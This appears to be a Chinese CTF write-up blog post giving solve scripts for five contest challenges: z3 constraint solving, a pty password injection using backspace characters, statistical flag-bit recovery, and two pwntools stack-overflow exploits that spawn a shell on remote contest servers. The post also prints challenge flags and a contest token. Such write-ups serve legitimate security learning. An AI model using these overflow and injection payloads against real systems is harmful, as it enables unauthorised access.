高校运维2024
·903 words·5 mins
Table of Contents
死掉了
babyre #
z3库位运算解方程
from z3 import *
from Crypto.Util.number import long_to_bytes, bytes_to_long
from hashlib import md5
s = Solver()
x1 = 0xADB1D018 + 0x36145344
x2 = BitVec('x', 32)
s.add((x2 | 0x8E03BEC3) - 3 * (x2 & 0x71FC413C) + x2 == 0x902C7FF8)
s.check()
x2 = s.model()[x2].as_long()
# print(x2)
# #
x3 = BitVec('x1', 32)
s.add(x3 <= 0x10000000)
s.add(( 4 * ((~x3 & 0xA8453437) + 2 * ~(~x3 | 0xA8453437))
+ -3 * (~x3 | 0xA8453437)
+ 3 * ~(x3 | 0xA8453437)
- (-10 * (x3 & 0xA8453437)
+ (x3 ^ 0xA8453437)) == 551387557 ))
s.check()
x3 = s.model()[x3].as_long()
# #
x4 = BitVec('x2', 32)
s.add(x4 <= 0x10000000, x4 > 0)
s.add( 11 * ~(x4 ^ 0xE33B67BD)
+ 4 * ~(~x4 | 0xE33B67BD)
- (6 * (x4 & 0xE33B67BD)
+ 12 * ~(x4 | 0xE33B67BD))
+ 3 * (x4 & 0xD2C7FC0C)
+ -5 * x4
- 2 * ~(x4 | 0xD2C7FC0C)
+ ~(x4 | 0x2D3803F3)
+ 4 * (x4 & 0x2D3803F3)
- -2 * (x4 | 0x2D3803F3) == 0xCE1066DC )
s.check()
x4 = s.model()[x4].as_long()
print(x1,x2,x3,x4)
# 3821413212 98124621 78769651 67321987
# flag{e3c6235c-05d9434d-04b1edf3-04034083}
zip #
源码里面的write是在模拟标准输入,和memcpy不一样
转义字符输入到命令行可以模拟键盘操作 从而控制password
这里使用64个\x7f删掉token前64位 然后随意跟上password
源码出问题的地方:
void zip(char *password) {
int master, pid;
pid = forkpty(&master, NULL, NULL, NULL);
if (pid == 0) {
char* argv[] = { "7z", "a", "flag.zip", "/tmp/flag.txt", "-mem=AES256", "-p", NULL };
execve("/usr/bin/7z", argv, NULL);
} else {
char buffer[4097];
while (true) {
ssize_t n = read(master, buffer, 4096);
if (n < 0) break;
fflush(stdout);
write(1, buffer, n);
buffer[n] = 0;
if (strstr(buffer, "password")) {
usleep(10000);
write(master, password, strlen(password));
write(master, "\n", 1);
}
}
wait(NULL);
}
close(master);
}
exp
from pwn import *
token = b''
# con = remote("prob03.contest.pku.edu.cn", 10003)
con =process('./zip')
con.sendlineafter(b"Please input your token: ", token)
passwd_enc = token[:64] + b"\x7F" * 64 + b"flag{"
con.sendlineafter(b"your token:\n", passwd_enc)
passwd_dec = b"flag{"
con.sendlineafter(b"your flag:\n", passwd_dec)
con.interactive()
secretbit #
测试发现当m、n不同时,instance返回1的概率会发生变化
task
from secret import flag
from random import randrange, shuffle
from Crypto.Util.number import bytes_to_long
from tqdm import tqdm
def instance(m, n):
start = list(range(m))
shuffle(start)
for i in range(m):
now = start[i]
this_turn = False
for j in range(n-1):
if now == i:
this_turn = True
break
now = start[now]
if not this_turn:
return 0
return 1
def leak(m, n, times=2000):
message = [instance(m, n) for _ in range(times)]
return message
MAX_M = 400
MIN_M = 200
flag_b = [int(i) for i in bin(bytes_to_long(flag))[2:]]
leak_message = []
for bi in tqdm(flag_b):
while True:
tmp_m0 = randrange(MIN_M, MAX_M)
tmp_n0 = randrange(int(tmp_m0//2), int(tmp_m0 * 8 // 9))
tmp_m1 = randrange(MIN_M, MAX_M)
tmp_n1 = randrange(int(tmp_m1//2), int(tmp_m1 * 8 // 9))
if abs(tmp_m0-tmp_m1-tmp_n0+tmp_n1) > MAX_M // 5:
break
choose_m = tmp_m0 if bi == 0 else tmp_m1
choose_n = tmp_n0 if bi == 0 else tmp_n1
leak_message.append([[tmp_m0, tmp_n0], [tmp_m1, tmp_n1], leak(choose_m, choose_n)])
open('data.txt', 'w').write(str(leak_message))
exp
def instance(m, n):
start = list(range(m))
shuffle(start)
for i in range(m):
now = start[i]
this_turn = False
for j in range(n-1):
if now == i:
this_turn = True
# print(i)
# input()
break
now = start[now]
if not this_turn:
# print(start)
return 0
# print(start)
return 1
flag = []
for [m0, n0], [m1, n1], leak_msg in leak_message:
F = 0
T = 0
tag = leak_msg.count(1)
for i in range(2000):
# print(第,i,组)
F += instance(m0, n0)
for i in range(2000):
# print(第,i,组)
T += instance(m1, n1)
if(abs(F-tag)<abs(T-tag)):
flag.append(0)
else:
flag.append(1)
print(flag)
print(flag)
# flag = [1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1]
# flag{this_1s_the_sEcret_f1ag}
babypwn #
对password栈溢出到401184system处
将password用00截断作为参数用到system里面
用a来padding
from pwn import *
# r=process('./pwn')
r = remote('prob07.contest.pku.edu.cn',10007)
r.sendlineafter("Please input your token: ",b'')
r.recvuntil(b"username: ")
r.sendline('helloworld')
r.recv()
payload = b'/bin/sh\x00'+6*8*b'a'+p64(0x401184)
r.sendline(payload)
r.interactive()
login #
recvall接收文件
from pwn import *
# 你可以 打开网页终端 或者通过命令 nc prob04.contest.pku.edu.cn 10004 连接到题目
p=remote('prob04.contest.pku.edu.cn','10004')
token= b''
p.sendlineafter(b"Please input your token:",token)
# p.sendline()
p.sendlineafter(b"Username",b"hello world")
buf = p.recvuntil(b'Password: ')
payload = b'a'*0x40
p.sendline(payload)
p.recvuntil(b'Core dumped\n')
print(buf)
# buf = p.recv(2048)
buf = p.recvall()
print(buf)
with open('tmp', 'wb') as f:
f.write(buf)
栈溢出脚本
from pwn import *
# 你可以 打开网页终端 或者通过命令 nc prob04.contest.pku.edu.cn 10004 连接到题目
p=process('./tmp')
p=remote('prob04.contest.pku.edu.cn','10004')
# 219:MEQCIChdqn_wNP2ro4YA5ncWPK0wu9qUpGS95zBgFOfy0fYKAiA4ygaWckU4T88c506D9gVi4SgHbPCG1ROlRSCogIRbdg==
token= b'219:MEQCIChdqn_wNP2ro4YA5ncWPK0wu9qUpGS95zBgFOfy0fYKAiA4ygaWckU4T88c506D9gVi4SgHbPCG1ROlRSCogIRbdg=='
p.sendlineafter(b"Please input your token:",token)
# p.sendline()
p.sendlineafter(b"Username",b"hello world")
buf = p.recvuntil(b'Password: ')
payload=b'a'*0x98+p64(0x40127E)
p.sendline(payload)
p.interactive()
# flag{loGIN_SUccESs_congrAtULaTIOn}